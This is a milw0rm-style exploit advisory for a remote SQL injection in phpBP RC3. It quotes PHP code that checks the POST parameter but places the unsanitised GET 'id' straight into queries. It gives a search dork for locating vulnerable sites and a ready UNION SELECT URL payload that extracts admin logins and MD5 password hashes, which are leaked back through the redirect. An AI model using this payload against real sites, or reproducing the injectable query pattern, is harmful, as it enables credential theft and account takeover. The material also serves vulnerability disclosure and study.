.-----------------------------------------------------------------------------. | vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability | | download: http://www.phpbp.com/ | | dork: "PHP BP Team" | | | | author: irk4z@yahoo.pl | | homepage: http://irk4z.wordpress.com/ | | | | ---> HACKBOX.pl <--- | | | | greets to: cOndemned, str0ke, wacky | '-----------------------------------------------------------------------------' # code: ./includes/functions/banners-external.php: ... 3 function banner_out() //zlicza ilosc klikniec na banner 4 { 5 global $conf; 6 7 if($_GET['id']) 8 { 9 SQLvalidate($_POST['id']); 10 11 $db = new dbquery; 12 $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__); 13 14 if($db->num_rows()==0) 15 { 16 redirect('index.php?module=error?error=banners_error2'); 17 exit; 18 } 19 20 $d=$db->fetch_object(); 21 $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__); 22 23 redirect($d->url); 24 } 25 26 exit; 27 } ... # exploit: http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/* you will be redirect to http://[login]_[md5_hash_pass] (ex. http://admin_21232f297a57a5a743894a0e4a801fc3/) # milw0rm.com [2008-03-16]